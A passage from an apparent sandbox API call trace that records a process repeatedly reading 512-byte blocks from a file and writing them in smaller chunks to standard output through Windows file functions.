lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.743] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 
[0141.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.743] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, 
lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.744] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.744] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] GetFileType (hFile=0x4c) returned 0x1 [0141.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.745] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.745] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] GetFileType (hFile=0x4c) returned 0x1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.746] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.746] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, 
lpOverlapped=0x0) returned 1 [0141.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 
| out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] GetFileType (hFile=0x4c) returned 0x1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.747] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.747] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.748] GetFileType (hFile=0x4c) returned 0x1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0141.748] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.748] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 
[0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.749] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, 
lpNumberOfBytesRead=0x2cdf10*=0x200, lpOverlapped=0x0) returned 1 [0141.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.749] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ced70*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cedc0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee10*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee60*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cee60*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2ceeb0*, lpNumberOfBytesWritten=0x2cdf04*=0x50, lpOverlapped=0x0) returned 1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.750] GetFileType (hFile=0x4c) returned 0x1 [0141.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.268] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef00*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdf04, lpOverlapped=0x0 | out: lpBuffer=0x2cef00*, lpNumberOfBytesWritten=0x2cdf04*=0x20, lpOverlapped=0x0) returned 1 [0142.268] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.268] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdef0 | out: lpNewFilePointer=0x0) returned 1 [0142.269] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.269] ReadFile (in: hFile=0x54, lpBuffer=0x2ced20, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdf10, lpOverlapped=0x0 | out: lpBuffer=0x2ced20*, 